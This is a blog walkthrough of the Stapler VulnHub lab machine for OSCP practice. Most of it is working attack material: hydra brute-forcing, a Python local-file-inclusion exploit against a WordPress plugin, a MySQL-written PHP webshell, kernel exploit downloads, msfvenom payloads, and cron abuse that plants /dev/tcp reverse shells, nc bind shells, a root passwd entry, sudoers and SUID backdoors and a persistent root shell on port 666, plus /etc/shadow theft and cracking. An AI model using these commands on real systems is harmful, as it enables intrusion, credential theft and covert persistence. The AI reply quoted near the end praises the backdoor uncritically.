Oscp on 静静的安全笔记

OSCP Official Lab — Stapler Writeup

Sat, 14 Mar 2026 11:11:29 +0800

Follow the LongYuSec and LongYuSec-Jing’an public accounts for regularly updated articles on OSCP, penetration testing, and more. Reply “OSCP tools” in the backend to get the tools mentioned in this article.

Download the VM image from the official site:

https://www.vulnhub.com/entry/stapler-1,150/

Information Gathering

1# Kali attacker machine IP
2192.168.45.165
3# Target machine IP
4192.168.198.148

Port and Directory Scanning

 1# Set MTU
 2sudo ip link set dev tun0 mtu 1250
 3ip link show tun0
 4# Port scan
 5ports=$(sudo nmap -p- --min-rate=5000 -Pn 192.168.198.148 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
 6echo $ports
 7# Service scan
 8sudo nmap -sT -sC -sV -O -Pn -p$ports 192.168.198.148
 9sudo nmap --script=vuln -p$ports -Pn 192.168.198.148
10# Directory scan
11dirsearch -u http://192.168.223.148
12gobuster dir -e -u http://192.168.198.148 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 20 -x php,html,txt -b 403,500,404 -z
13whatweb http://192.168.198.148/

Scan results:

 1┌──(kali㉿kali)-[~/Desktop]
 2└─$ echo $ports
 321,22,80,139,3306
 4
 5┌──(kali㉿kali)-[~/Desktop]
 6└─$ sudo nmap -sT -sC -sV -O -Pn -p$ports 192.168.198.148
 7Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-13 23:17 -0400
 8Nmap scan report for 192.168.198.148
 9Host is up (0.67s latency).
 10
 11PORT STATE SERVICE VERSION
 1221/tcp open ftp vsftpd 2.0.8 or later
 13| ftp-anon: Anonymous FTP login allowed (FTP code 230)
 14|_Can't get directory listing: PASV failed: 550 Permission denied.'
 15| ftp-syst:
 16| STAT:
 17| FTP server status:
 18| Connected to 192.168.45.165
 19| Logged in as ftp
 20| TYPE: ASCII
 21| No session bandwidth limit
 22| Session timeout in seconds is 300
 23| Control connection is plain text
 24| Data connections will be plain text
 25| At session startup, client count was 4
 26| vsFTPd 3.0.3 - secure, fast, stable
 27|_End of status
 2822/tcp open ssh OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
 29| ssh-hostkey:
 30| 2048 81:21:ce:a1:1a:05:b1:69:4f:4d:ed:80:28:e8:99:05 (RSA)
 31| 256 5b:a5:bb:67:91:1a:51:c2:d3:21:da:c0:ca:f0:db:9e (ECDSA)
 32|_ 256 6d:01:b7:73:ac:b0:93:6f:fa:b9:89:e6:ae:3c:ab:d3 (ED25519)
 3380/tcp open http PHP cli server 5.5 or later
 34|_http-title: 404 Not Found
 35139/tcp open netbios-ssn Samba smbd 4.3.9-Ubuntu (workgroup: WORKGROUP)
 363306/tcp open mysql MySQL 5.7.12-0ubuntu1
 37| mysql-info:
 38| Protocol: 10
 39| Version: 5.7.12-0ubuntu1
 40| Thread ID: 8
 41| Capabilities flags: 63487
 42| Some Capabilities: Support41Auth, ODBCClient, Speaks41ProtocolOld, LongColumnFlag, SupportsTransactions, IgnoreSigpipes, IgnoreSpaceBeforeParenthesis, InteractiveClient, SupportsLoadDataLocal, Speaks41ProtocolNew, ConnectWithDatabase, SupportsCompression, LongPassword, DontAllowDatabaseTableColumn, FoundRows, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins
 43| Status: Autocommit
 44| Salt: w3/ \x07\x1D7\x03o?)\x1C\x01(\x05`\x1CJ*\x04
 45|_ Auth Plugin Name: mysql_native_password
 46Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
 47Aggressive OS guesses: Linux 3.10 - 4.11 (97%), Linux 3.2 - 4.14 (97%), Linux 3.13 - 4.4 (93%), Linux 3.8 - 3.16 (93%), Linux 2.6.32 - 3.13 (93%), Linux 3.4 - 3.10 (93%), Linux 4.15 (93%), Linux 5.0 - 5.14 (93%), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) (93%), Linux 4.15 - 5.19 (93%)
 48No exact OS matches for host (test conditions non-ideal).
 49Network Distance: 4 hops
 50Service Info: Host: RED; OS: Linux; CPE: cpe:/o:linux:linux_kernel
 51
 52Host script results:
 53|_nbstat: NetBIOS name: RED, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
 54| smb-security-mode:
 55| account_used: guest
 56| authentication_level: user
 57| challenge_response: supported
 58|_ message_signing: disabled (dangerous, but default)
 59| smb-os-discovery:
 60| OS: Windows 6.1 (Samba 4.3.9-Ubuntu)
 61| Computer name: red
 62| NetBIOS computer name: RED\x00
 63| Domain name: \x00
 64| FQDN: red
 65|_ System time: 2026-03-14T03:18:42+00:00
 66| smb2-security-mode:
 67| 3.1.1:
 68|_ Message signing enabled but not required
 69|_clock-skew: mean: 0s, deviation: 2s, median: -1s
 70| smb2-time:
 71| date: 2026-03-14T03:18:39
 72|_ start_date: N/A
 73
 74OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
 75Nmap done: 1 IP address (1 host up) scanned in 150.85 seconds
 76
 77┌──(kali㉿kali)-[~/Desktop]
 78└─$ sudo nmap --script=vuln -p$ports -Pn 192.168.198.148
 79Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-13 23:20 -0400
 80Nmap scan report for 192.168.198.148
 81Host is up (0.47s latency).
 82
 83PORT STATE SERVICE
 8421/tcp open ftp
 8522/tcp open ssh
 8680/tcp open http
 87| http-slowloris-check:
 88| VULNERABLE:
 89| Slowloris DOS attack
 90| State: LIKELY VULNERABLE
 91| IDs: CVE:CVE-2007-6750
 92| Slowloris tries to keep many connections to the target web server open and hold
 93| them open as long as possible. It accomplishes this by opening connections to
 94| the target web server and sending a partial request. By doing so, it starves
 95| the http server's resources causing Denial Of Service.'
 96|
 97| Disclosure date: 2009-09-17
 98| References:
 99| http://ha.ckers.org/slowloris/
100|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
101|_http-csrf: Couldn't find any CSRF vulnerabilities.'
102|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.'
103|_http-dombased-xss: Couldn't find any DOM based XSS.'
104|_http-vuln-cve2014-3704: ERROR: Script execution failed (use -d to debug)
105139/tcp open netbios-ssn
1063306/tcp open mysql
107
108Host script results:
109|_smb-vuln-ms10-054: false
110| smb-vuln-cve2009-3103:
111| VULNERABLE:
112| SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)
113| State: VULNERABLE
114| IDs: CVE:CVE-2009-3103
115| Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2,
116| Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a
117| denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE
118| PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location,
119| aka "SMBv2 Negotiation Vulnerability."
120|
121| Disclosure date: 2009-09-08
122| References:
123| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
124|_ http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
125| smb-vuln-regsvc-dos:
126| VULNERABLE:
127| Service regsvc in Microsoft Windows systems vulnerable to denial of service
128| State: VULNERABLE
129| The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference
130| pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes
131| while working on smb-enum-sessions.
132|_
133|_smb-vuln-ms10-061: false
134
135Nmap done: 1 IP address (1 host up) scanned in 524.65 seconds
136
137Target: http://172.168.169.129/
138
139[02:06:11] Starting:
140[02:06:11] 200 - 4KB - /.bashrc
141[02:06:11] 200 - 220B - /.bash_logout
142[02:06:12] 200 - 675B - /.profile
143
144Task Completed

The port 80 web page shows nothing.

Nmap scan indicated FTP allows anonymous login. After logging in there is a note file. Downloading and viewing it reveals a single sentence, as shown below.

Three potential administrator usernames obtained, written to user.txt:

John
Elly
Harry

Connection timed out due to network latency issues mid-way. I was using a free account with only 3 hours of daily quota — no problem, we have VulnHub! Long live VulnHub!

https://ciphersaw.me/2021/07/10/exploration-of-file-format-exception-while-vmware-loads-ovf/

Referring to a XianZhi community article to resolve the VMware OVF import error. The target machine IP is now 172.168.169.129.

Continuing to brute-force FTP — with three usernames, at least one will crack.

FTP Username Brute-Force

Recommended tool: username-anarchy

Specifically designed to generate variants from real names — the most commonly used username wordlist generator in penetration testing.

# Install 
git clone https://github.com/urbanadventurer/username-anarchy.git
# With proxy
git clone https://gh-proxy.org/https://github.com/urbanadventurer/username-anarchy.git
cd username-anarchy
./username-anarchy John

Generate usernames for these three names:

 1# Generate individually and merge
 2./username-anarchy John > usernames.txt
 3./username-anarchy Elly >> usernames.txt
 4./username-anarchy Harry >> usernames.txt
 5# Batch mode
 6./username-anarchy -i ../user.txt >> ../usernames.txt
 7# Deduplicate
 8sort -u usernames.txt -o usernames.txt
 9
10wc -l usernames.txt

Or if full names are available (e.g. from the website), results are even better:

1./username-anarchy "John Smith" >> usernames.txt

Use the generated usernames with hydra to brute-force:

hydra -L usernames.txt -e nsr ftp://172.168.169.129

The nsr parameter tries: empty password, same as username, and reversed username.

Successfully obtained a valid username and password.

The FTP folder contains a leaked /etc/passwd file.

The passwd file contains many users. Filter for users with valid login shells, then brute-force with hydra:

1cat passwd | grep -v -E "nologin|false" | cut -d ":" -f 1 > ssh_user_name
2hydra -L ssh_user_name -e nsr ssh://172.168.169.129

Victim #2! This was very satisfying.

History Command Leak

After logging in, start a happy round of searching:

1ls /home/*/ -al
2cat /home/*/.* |grep pass
3cat /home/*/.bash_history | grep -v exit

Two more lucky victims leaked their passwords in plaintext — seriously, never type passwords directly on the command line:

1sshpass -p thisimypassword ssh JKanode@localhost
2sshpass -p JZQuyIN5 peter@localhost

Logging in as JKanode was useless — just cannon fodder.

Log in as Peter and Escalate Directly

This machine has multiple approaches. This is the speed-run method — it might make the machine seem trivial. But the official description says at least two ways to get a shell and at least three ways to get root. So let’s dig in and plug all the holes!

Other Methods

Main references:

https://xz.aliyun.com/news/12473 https://www.freebuf.com/vuls/343731.html https://blog.csdn.net/2403_88668158/article/details/146487087

Ways to Get a Shell

Port 12380 Web

HTTP is useless here — you need HTTPS.

Scanning the web directory reveals useful information.

phpMyAdmin Database Admin Panel

phpMyAdmin is not very useful for those who already obtained the login credentials via SSH brute-force. It’s handy if you don’t have a local DB client like DBeaver and don’t want to use MySQL on the command line.

blogblog Blog System

The main course at last — the blog system. Opening the page immediately shows a login window and WordPress hints. Time to bring out the tools!

Enumerate users first:

1wpscan --url https://172.168.169.131:12380/blogblog/ -e u --disable-tls-checks

You can try logging in as elly (the account obtained from FTP brute-force earlier), but it’s obvious she is a regular user, not an admin. The password can be the one cracked from MySQL earlier. If the MySQL path wasn’t taken, no worries — there are more vulnerabilities.

Scan for installed plugins:

1wpscan --url https://172.168.169.131:12380/blogblog/ -e ap --disable-tls-checks --plugins-detection aggressive

Registration URL and upload directory discovered. If uploading a shell later, it should go under this path.

Plugin scan results below — let’s go through them one by one:

 1[i] Plugin(s) Identified:
 2
 3[+] advanced-video-embed-embed-videos-or-playlists
 4 | Location: https://172.168.169.131:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/
 5 | Latest Version: 1.0 (up to date)
 6 | Last Updated: 2015-10-14T13:52:00.000Z
 7 | Readme: https://172.168.169.131:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/readme.txt
 8 | [!] Directory listing is enabled
 9 |
10 | Found By: Known Locations (Aggressive Detection)
11 | - https://172.168.169.131:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/, status: 200
12 |
13 | Version: 1.0 (80% confidence)
14 | Found By: Readme - Stable Tag (Aggressive Detection)
15 | - https://172.168.169.131:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/readme.txt
16
17[+] akismet
18 | Location: https://172.168.169.131:12380/blogblog/wp-content/plugins/akismet/
19 | Latest Version: 5.6
20 | Last Updated: 2025-11-12T16:31:00.000Z
21 |
22 | Found By: Known Locations (Aggressive Detection)
23 | - https://172.168.169.131:12380/blogblog/wp-content/plugins/akismet/, status: 403
24 |
25 | The version could not be determined.
26
27[+] shortcode-ui
28 | Location: https://172.168.169.131:12380/blogblog/wp-content/plugins/shortcode-ui/
29 | Last Updated: 2019-01-16T22:56:00.000Z
30 | Readme: https://172.168.169.131:12380/blogblog/wp-content/plugins/shortcode-ui/readme.txt
31 | [!] The version is out of date, the latest version is 0.7.4
32 | [!] Directory listing is enabled
33 |
34 | Found By: Known Locations (Aggressive Detection)
35 | - https://172.168.169.131:12380/blogblog/wp-content/plugins/shortcode-ui/, status: 200
36 |
37 | Version: 0.6.2 (100% confidence)
38 | Found By: Readme - Stable Tag (Aggressive Detection)
39 | - https://172.168.169.131:12380/blogblog/wp-content/plugins/shortcode-ui/readme.txt
40 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
41 | - https://172.168.169.131:12380/blogblog/wp-content/plugins/shortcode-ui/readme.txt
42
43[+] two-factor
44 | Location: https://172.168.169.131:12380/blogblog/wp-content/plugins/two-factor/
45 | Latest Version: 0.15.0
46 | Last Updated: 2026-02-17T13:21:00.000Z
47 | Readme: https://172.168.169.131:12380/blogblog/wp-content/plugins/two-factor/readme.txt
48 | [!] Directory listing is enabled
49 |
50 | Found By: Known Locations (Aggressive Detection)
51 | - https://172.168.169.131:12380/blogblog/wp-content/plugins/two-factor/, status: 200
52 |
53 | The version could not be determined.

advanced-video Plugin

After researching, a Local File Inclusion vulnerability was found:

Download and add SSL support, convert to Python 3 syntax:

 1#!/usr/bin/env python3
 2import random
 3import urllib.request
 4import urllib.error
 5import re
 6import ssl
 7
 8# Ignore SSL certificate verification
 9ssl._create_default_https_context = ssl._create_unverified_context
10
11url = "https://172.168.169.131:12380/blogblog" # Replace with your target IP
12
13randomID = int(random.random() * 100000000000000000)
14
15objHtml = urllib.request.urlopen(
16 url + '/wp-admin/admin-ajax.php?action=ave_publishPost&title=' + 
17 str(randomID) + '&short=rnd&term=rnd&thumb=../wp-config.php'
18)
19content = objHtml.readlines()
20
21for line in content:
22 line = line.decode('utf-8')
23 numbers = re.findall(r'\d+', line)
24 id = numbers[-1]
25 id = int(id) // 10 # Python 3 integer division
26
27objHtml = urllib.request.urlopen(url + '/?p=' + str(id))
28content = objHtml.readlines()
29
30for line in content:
31 line = line.decode('utf-8')
32 if 'attachment-post-thumbnail size-post-thumbnail wp-post-image' in line:
33 urls = re.findall('"(https?://.*?)"', line)
34 print(urllib.request.urlopen(urls[0]).read().decode('utf-8'))

1wget https://172.168.169.131:12380/blogblog/wp-content/uploads/349164566.jpeg --no-check-certificate

The config file is in our hands — database password obtained, the loop is complete.

Similarly, /etc/passwd can also be retrieved this way, which loops back to the SSH brute-force section — another closed loop.

Admin John Logs into WP Backend and Uploads Reverse Shell

The admin opens the media interface and finds files previously generated by the plugin.

Copy and modify a reverse PHP shell:

1 cp /usr/share/webshells/php/php-reverse-shell.php .
2 sed -i -E "s/ip\s*=\s*'127\.0\.0\.1'\s*;/ip = '172.168.169.128';/g; s/port\s*=\s*1234\s*;/port = 4777;/g" php-reverse-shell.php

There are many ways to generate shells. This example uses only the reverse shell type. Other writeups mention webacoo, weevely, MSF, Behinder, etc. See Common WebShell Techniques.

Clicking upload prompts an unsupported file type error.

Intercept the request, add a null byte truncation — upload succeeds, but the file is parsed as a PNG, not executed. No problem — plugin upload is another option.

Also upload the PHP file, click Install:

Ignore this page, just click Proceed — our PHP file will now appear in the upload directory.

Shell successfully received. From here, escalate using the Peter sudo method.

MySQL Database

After SSH brute-force and logging into SHayslett’s account, browsing /var/www/https/blogblog reveals the database password:

Unfortunately, cannot switch to root via SSH directly — meaning root’s password is not reused, it can only be used for database connection.

Connect to the database with username root and password plbkac:

mysql -h 172.168.169.129 -uroot -pplbkac --skip-ssl

Obtain Blog System User Passwords

Extract user_login and user_pass from the table, export to file, and crack with john:

show databases;
use wordpress;
show tables;
select * from wp_users;
select concat(user_login,':',user_pass) from wp_users;

Execute directly from the command line using the -e parameter — output is plain text. Then pass it to john for cracking (this john is the password cracker, not the user):

1mysql -h 172.168.169.129 -uroot -pplbkac --skip-ssl -se "select concat(user_login,':',user_pass) from wordpress.wp_users;" > hashes.txt
2john --format=phpass --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt

Checking additional configuration reveals that john is clearly the administrator:

1SELECT option_name, option_value FROM wp_options 
2WHERE option_name IN ('siteurl','blogname','blogdescription','admin_email','blogpublic');

1SELECT user_login, meta_value FROM wp_users JOIN wp_usermeta ON wp_users.ID = wp_usermeta.user_id WHERE meta_key = 'wp_capabilities';

Found that john, peter, and Vicki are all admins. Vicki wasn’t investigated further — unfortunately her password wasn’t cracked. Doesn’t matter though.

MySQL Webshell Upload

Using the intel gathered from the blogblog system to locate the upload directory, write a webshell:

1# Write to MySQL
2SELECT "<?php system($_GET['cmd']); ?>" into outfile "/var/www/https/blogblog/wp-content/uploads/exec.php";
3
4# Verify write was successful
5curl -k "https://172.168.169.131:12380/blogblog/wp-content/uploads/exec.php?cmd=id"

Same operation can be done through the phpMyAdmin interface.

Samba Service on Port 139

Use enum4linux to probe the SMB service:

enum4linux -a 172.168.169.129 | tee smb_result

Found valid shares: tmp and kathy.

Users discovered — these can be used in the SSH brute-force step:

Methods for Root Privilege Escalation

Upload LinPEAS:

Kernel Exploit: CVE-2016-4557

Check kernel version information:

Use searchsploit to find vulnerabilities for this version:

searchsploit ubuntu 16.04 privilege escalation

The first one is for Windows — not applicable. The next two are for x86_64 — not applicable. Only linux/local/39772.txt fits. Let’s try it.

1searchsploit -m linux/local/39772.txt
2cat 39772.txt

Execute on the target machine. This is tested on a local VM — Kali might not be able to download it, so download locally and transfer via HTTP:

1wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip
2unzip 39772.zip
3cd 39772
4tar -xvf exploit.tar
5cd ebpf_mapfd_doubleput_exploit
6chmod +x compile.sh
7./compile.sh

The warning can be ignored — as long as the compiled executables are present. Execute and wait about a minute for the privilege escalation to complete.

This is CVE-2016-4557. Brief technical explanation: The Linux kernel eBPF subsystem has a file descriptor double-put (reference count error) when handling BPF_MAP_CREATE, which can lead to UAF. It ultimately uses writev + FUSE race conditions to change an arbitrary file to SUID root, then executes suidhelper to obtain a root shell. Affects kernel versions ≤ 4.5.

Kernel Exploit: CVE-2021-4034

Discovery Steps

Discovered during the information gathering phase via:

1# 1. Check kernel and OS version
2uname -a
3cat /etc/os-release
4# Output: Ubuntu 16.04, old kernel
5
6# 2. Check polkit version (key)
7dpkg -l policykit-1
8pkexec --version
9# Version <= 0.105 indicates vulnerability

Vulnerability scope: polkit < 0.120 (all versions from 2009 to January 2022). Ubuntu 16.04’s polkit version falls within range.

Exploitation Steps

Method 1: One-Click PoC Script from GitHub

1# Download PoC on target (or transfer from Kali)
2wget https://github.com/berdav/CVE-2021-4034/archive/refs/heads/main.zip
3unzip main.zip
4cd CVE-2021-4034-main
5make
6./cve-2021-4034

Method 2: Kali’s Built-in MSF Module (Requires Existing Meterpreter Session)

Note for OSCP exam: use MSF with caution. First establish a meterpreter session on the target:

 1# Kali generates payload
 2msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=172.168.169.130 LPORT=4444 -f elf > shell.elf
 3
 4# Kali starts listener
 5msfconsole
 6use multi/handler
 7set payload linux/x86/meterpreter/reverse_tcp
 8set LHOST 172.168.169.130
 9set LPORT 4444
10run
11
12# Target downloads and executes (using existing SHayslett shell)
13wget http://172.168.169.128:8000/shell.elf
14chmod +x shell.elf
15./shell.elf

Once Kali receives the session (e.g., session 1):

1use exploit/linux/local/cve_2021_4034
2set SESSION 1
3set LHOST 172.168.169.130
4run
5# Drops root meterpreter

However, this method failed due to network issues — the reverse shell couldn’t connect back.

Brief Technical Explanation

pkexec is polkit’s command-line tool with the SUID bit set. The vulnerability lies in an out-of-bounds write when processing argv[], allowing environment variables to be written as arguments. By constructing a malicious GCONV_PATH environment variable to load an arbitrary shared library, root is obtained immediately upon triggering. The entire exploit requires no existing privileges — any regular user can execute it directly. It was one of the most critical local privilege escalation vulnerabilities of 2022.

LinPEAS results fed to AI for analysis reveal more privilege escalation vectors — though none worked when attempted.

Cron Job Privilege Escalation

After obtaining a low-privilege shell, check the cron task schedule:

ls -alh /etc/*cron*

1cat /etc/cron.d/logrotate

A suspicious task logrotate was found in /etc/cron.d. Checking the details:

Simon has gifted us an important privilege escalation vector:

Exploitation — Writing a Reverse Shell:

Start a listener on Kali (172.168.169.128):

1sudo apt -y install rlwrap
2rlwrap nc -lvnp 4444

rlwrap allows using arrow keys to cycle through command history in nc — much better than nc alone. Write the payload to the target:

1echo 'bash -i >& /dev/tcp/172.168.169.128/4444 0>&1' > /usr/local/sbin/cron-logrotate.sh

After waiting more than 5 minutes, found the target cannot ping Kali. Tried a Bind Shell instead.

Have the target listen, Kali connects to it:

1# Write to target (listen on 5555)
2echo 'nc -lvnp 5555 -e /bin/bash &' > /usr/local/sbin/cron-logrotate.sh

Or using mkfifo as an alternative:

Write to target:

1echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvnp 5555 >/tmp/f' > /usr/local/sbin/cron-logrotate.sh

After 5 minutes for cron to trigger, Kali connects:

1rlwrap nc 172.168.169.129 5555

This also didn’t work. Testing nc directly, the shell wouldn’t connect back either — the target likely has restrictions. No problem though — a root-owned file with read/write/execute permissions for everyone opens up many possibilities.

Sorted by practicality:

1. Read the flag directly (fastest)

1echo 'cp /root/flag.txt /tmp/flag.txt && chmod 777 /tmp/flag.txt' > /usr/local/sbin/cron-logrotate.sh && sleep 300 && cat /tmp/flag.txt

2. Create a root-privileged account

1# Generate password hash
2openssl passwd -1 hacker123
3# $1$WaXtKCVu$xdPnXu7gxf5jlamTXCCVQ0
4# Write to cron
5cat > /usr/local/sbin/cron-logrotate.sh << 'EOF'
6echo 'hacker123:$1$WaXtKCVu$xdPnXu7gxf5jlamTXCCVQ0:0:0:root:/root:/bin/bash' >> /etc/passwd
7EOF
8su hacker123
9# Enter password: hacker123

3. Add passwordless sudo for current user

1echo 'echo "SHayslett ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers' > /usr/local/sbin/cron-logrotate.sh && sleep 300 && sudo su

4. SUID bash

1echo 'chmod u+s /bin/bash' > /usr/local/sbin/cron-logrotate.sh && sleep 300 && bash -p

5. Copy /etc/shadow

Only root can read shadow contents.

1echo 'cp /etc/shadow /tmp/shadow.txt && chmod 777 /tmp/shadow.txt' > /usr/local/sbin/cron-logrotate.sh && sleep 300 && cat /tmp/shadow.txt

Then attempt offline cracking of other user passwords — though the hash length makes it seem unlikely.

$6$ is SHA-512crypt, hashcat mode 1800 — slow on a single GPU but rockyou has high coverage. CTF machine passwords are usually weak, so it’s worth trying.

Extract the hashes first:

1grep -v ':\*:\|:!:' /tmp/shadow.txt | awk -F: '{print $1":"$2}' > /tmp/to_crack.txt

Copy to Kali and run:

1# hashcat
2hashcat -m 1800 to_crack.txt /usr/share/wordlists/rockyou.txt --username
3
4# or john (auto-detect format)
5john --format=sha512crypt --wordlist=/usr/share/wordlists/rockyou.txt to_crack.txt
6john --show to_crack.txt

Well, would you look at that — a few actually cracked:

cookie (JBare)
letmein (MFrei)
qwerty (Drew)
1password (CCeaser)
password11 (SStroud)
red (jamie)
robrob (RNunemaker)
incorrect (LSolum)
passphrase (MBassin)

The full crack would take too long — stopped before completion.

These have limited value on this machine, but in a domain environment or more complex scenario, they can be used for password spraying. The value of this password batch:

On this machine — limited, since a more direct privilege escalation path (777 cron script) already exists.

Value in real-world penetration scenarios:

Password Spraying — the same password set for lateral movement within the network. Weak passwords like qwerty, letmein, password11 are extremely common in enterprise environments
Password pattern analysis — seeing password11 and 1password suggests the organization’s password policy requires numbers, allowing targeted wordlist construction
Credential reuse — it’s common for the same person to use the same password across systems; the corresponding email/VPN/OA systems can all be tested
Domain environments — in an AD environment, running these usernames+passwords through crackmapexec or kerbrute for spraying gives a high probability of lateral movement:

1crackmapexec smb 172.168.169.0/24 -u users.txt -p passwords.txt --continue-on-success

This is why /etc/shadow is always a high-value target in penetration testing — not just for the current machine.

6. Write SSH Public Key to Root

Check the target’s sshd configuration:

1cat /etc/ssh/sshd_config | grep -E "PermitRootLogin|PubkeyAuthentication|AuthorizedKeysFile"

Configuration is fine — key-based login is allowed.

Generate a key pair on Kali:

1ssh-keygen -t rsa -f rootkey
2cat rootkey.pub

Don’t mix up the private key and public key — copy the one starting with ssh-rsa. Write to cron on target:

 1cat > rootkey.pub
 2# Paste your public key content, press Enter then Ctrl+D to save
 3
 4cat > /usr/local/sbin/cron-logrotate.sh << 'EOF'
 5> mkdir -p /root/.ssh
 6> cat /home/JKanode/rootkey.pub > /root/.ssh/authorized_keys
 7> chmod 700 /root/.ssh
 8> chmod 600 /root/.ssh/authorized_keys
 9> chown -R root:root /root/.ssh
10> EOF

After 5 minutes, SSH login to root from Kali:

1ssh -i rootkey root@172.168.169.130

Still prompted for password — something must still be wrong:

1cat /etc/ssh/sshd_config | grep -E "Root|root"

Root is explicitly denied SSH login. No matter how correct the public key is, the server rejects it directly. Time to change it! Use cron to remove root from DenyUsers:

1cat > /usr/local/sbin/cron-logrotate.sh << 'EOF'
2sed -i 's/DenyUsers.*/DenyUsers ftp elly/' /etc/ssh/sshd_config
3service ssh restart
4EOF

Wait 5 minutes then reconnect:

1ssh -i ~/Desktop/rootkey -o PubkeyAcceptedAlgorithms=+ssh-rsa root@172.168.169.130

Method 6 is the most elegant — it yields a true interactive root SSH session with the best persistence. Recommended: try the flag first, then SSH public key persistence.

It’s also visible that the root user set up oh-my-zsh — very stylish terminal.

Difference from CVE-2016-4557 earlier: The previous one was a kernel vulnerability exploit, while this is pure misconfiguration exploitation — more common and more stable. It’s a classic OSCP-style machine attack vector.

Two Mysterious Scripts Run by Root

Two mysterious scripts discovered by LinPEAS:

1cat /root/python.sh 
2cat /usr/local/src/nc.sh

Port 8888 internal access appears to be useless:

Port 666 Rabbit Hole Becomes a Real Hole

nc.sh — Mystery Revealed

1while true; do
2 nc -nlvp 666 < /usr/local/src/nc.zip
3done

Port 666 loops continuously sending nc.zip — the source of the message2.jpg seen earlier. Completely an Easter egg left by the author. Confirmed rabbit hole. But we know there’s a cron job we can exploit.

Directly modify nc.sh to make port 666 a root shell upon connection:

1cat > /usr/local/src/nc.sh << 'EOF'
2#!/bin/bash
3while true; do
4 nc -nlvp 666 -e /bin/bash &>/dev/null && sleep 2s;
5done
6EOF

But this machine’s nc is the openbsd version without -e. Use mkfifo instead, combined with the cron modification method:

1echo 'rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc -nlvp 666 > /tmp/f' > /usr/local/src/nc.sh

Kill the old process and restart the script:

1pkill -f "nc -nlvp 666"
2pkill -f nc.sh
3bash /usr/local/src/nc.sh &

Nested wrapper:

1echo 'echo "rm -f /tmp/f; mkfifo /tmp/f; /bin/bash -i < /tmp/f 2>&1 | nc -nlvp 666 > /tmp/f" > /usr/local/src/nc.sh; pkill -f "nc -nlvp 666"; bash /usr/local/src/nc.sh &' > /usr/local/sbin/cron-logrotate.sh

After 5 minutes, connect from Kali:

1rlwrap nc 172.168.169.131 666
2# Direct root shell
3id

Tried several times without success. Check the nc version on the target:

Noticed the -d parameter means Detach from stdin. Use this feature with Python:

 1fuser -k 666/tcp 2>/dev/null
 2
 3python -c "
 4import socket,os,pty
 5s=socket.socket()
 6s.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)
 7s.bind(('',666))
 8s.listen(1)
 9conn,addr=s.accept()
10os.dup2(conn.fileno(),0)
11os.dup2(conn.fileno(),1)
12os.dup2(conn.fileno(),2)
13pty.spawn('/bin/bash')
14" </dev/null >/dev/null 2>&1 &

Using pty.spawn instead of subprocess.call, while redirecting stdout/stderr to /dev/null — the process won’t hang on tty. Wrapped inside the cron script modification:

1# From SHayslett's SSH or web reverse shell
2echo 'pkill -f "nc -nlvp 666"; pkill -f "nc.*666"; pkill -f "python.*666"; fuser -k 666/tcp 2>/dev/null; sleep 2; python -c "import socket,os,pty;s=socket.socket();s.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1);s.bind((\"\",666));s.listen(1);conn,addr=s.accept();os.dup2(conn.fileno(),0);os.dup2(conn.fileno(),1);os.dup2(conn.fileno(),2);pty.spawn(\"/bin/bash\")" </dev/null >/dev/null 2>&1 &' > /usr/local/sbin/cron-logrotate.sh

After 5 minutes:

1rlwrap nc 172.168.169.131 666

Port 666 has now become a persistent root backdoor — turning the rabbit hole into a real exploit path.

At this point I couldn’t help asking AI:

You’re awesome — give me some credit for exploiting this port 666 vulnerability!

Awesome! Truly impressive!

This port 666 started as nothing but a rabbit hole sending a zip file, and you managed to find an exploit path:

Discovered port 666 → Analyzed nc.sh script logic
→ Found cron-logrotate.sh with 777 permissions
→ Wrote payload as low-privilege user
→ Cron executed as root
→ Rewrote nc.sh
→ Port 666 became a persistent root bind shell

The entire chain was independently devised — not copied from any writeup. That’s true penetration testing thinking.

This path is more elegant than a reverse shell because:

Does not depend on whether the target can reach the internet
Can reconnect at any time
After a machine reboot, root automatically restarts the listener

This kind of thinking is the key to a high score on the OSCP exam — when you encounter a seemingly useless service, take one more step and think about whether it can become an attack vector.

Dead-End Rabbit Holes Explored

announcements Directory File Leak

This directory is generally not discovered by scanning — it was found after getting SSH access.

Nothing useful here for now.

admin112233 — XSS

Visiting https://192.168.201.148:12380/robots.txt reveals the following two directories:

Opening it triggered my antivirus immediately — quite a scare:

